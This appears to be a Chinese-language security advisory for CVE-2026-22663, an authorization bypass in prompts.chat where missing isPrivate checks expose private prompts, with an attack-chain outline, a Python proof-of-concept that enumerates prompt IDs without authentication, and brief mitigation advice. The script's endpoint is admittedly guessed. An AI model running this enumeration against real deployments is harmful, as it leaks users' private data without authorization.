CVE-2026-22663 prompts.chat授权绕过漏洞

漏洞信息

漏洞编号

CVE-2026-22663

漏洞类型

授权绕过

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

prompts.chat

漏洞概述

prompts.chat在commit 7b81836之前的版本存在严重的授权绕过漏洞。由于多个API端点及页面元数据生成过程中缺失了关键的isPrivate权限检查，未经身份验证的攻击者可直接访问私有提示相关的敏感数据。利用此漏洞，攻击者能够获取私有提示的版本历史记录、变更请求、示例代码、当前内容详情，以及通过HTML元标签暴露的标题和描述信息，造成高机密性的数据泄露。

技术细节

该漏洞的根源在于prompts.chat后端服务在处理特定API端点（涉及版本历史、变更请求、示例及内容检索）时，未正确实施`isPrivate`属性的状态校验。应用逻辑存在缺陷，未能区分公开与私有资源，导致访问控制失效。此外，页面元数据生成模块也存在同样问题，将私有提示的标题和描述直接注入到HTML的`<meta>`标签中，使得敏感信息在客户端渲染前即被暴露。攻击者无需任何用户交互或身份认证（PR:N），仅需通过网络向目标API发送构造的HTTP GET请求，即可遍历并窃取所有私有提示的详细内容、历史版本及变更记录，造成严重的信息泄露。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用 prompts.chat 应用，并确认其版本早于 commit 7b81836。

STEP 2

枚举

攻击者编写脚本遍历提示 ID（ID 通常为自增整数），目标是 API 端点和 HTML 页面。

STEP 3

利用

攻击者向 API 端点（如获取版本历史、变更请求的接口）发送 HTTP GET 请求，请求中不包含任何认证 Token 或 Session。

STEP 4

权限绕过

服务器端接收请求后，由于代码中缺失 `isPrivate` 检查，错误地将私有资源视为公开资源处理。

STEP 5

数据泄露

服务器返回包含私有提示内容的 JSON 响应，或 HTML 源码中包含私有元数据，攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target base URL (Replace with actual target)
target_base = "https://example.prompts.chat"

# The vulnerable endpoint usually follows a pattern like /api/prompts/{id} or /api/prompts/{id}/versions
# Since specific endpoint details aren't provided, we simulate a common pattern for this type of app.
vulnerable_endpoint = "/api/prompts/{id}/details"

headers = {
    "User-Agent": "CVE-2026-22663-Scanner/1.0",
    "Accept": "application/json"
}

print("[*] Starting authorization bypass test on prompts.chat...")

# Iterate through potential prompt IDs
for prompt_id in range(1, 50):
    url = target_base + vulnerable_endpoint.format(id=prompt_id)
    
    try:
        # Send request without authentication token to exploit the missing isPrivate check
        response = requests.get(url, headers=headers, timeout=5)
        
        if response.status_code == 200:
            data = response.json()
            # Check if data contains sensitive fields indicating a private prompt was accessed
            if 'title' in data and 'content' in data:
                print(f"[+] Vulnerability confirmed! Leaked data for ID {prompt_id}:")
                print(f"    Title: {data.get('title')}")
                print(f"    Content: {data.get('content')[:50]}...")
        elif response.status_code == 403:
            print(f"[-] Access denied for ID {prompt_id} (Patch applied or not vulnerable)")
            
    except requests.RequestException as e:
        print(f"[!] Error connecting to {url}: {e}")

print("[*] Scan complete.")

影响范围

prompts.chat < commit 7b81836

防御指南

临时缓解措施

建议管理员立即检查现有日志，确认是否有异常的数据访问行为。如果不能立即升级代码，应考虑在应用网关（如 WAF）层面实施临时访问控制策略，阻断对敏感 API 端点的未授权请求。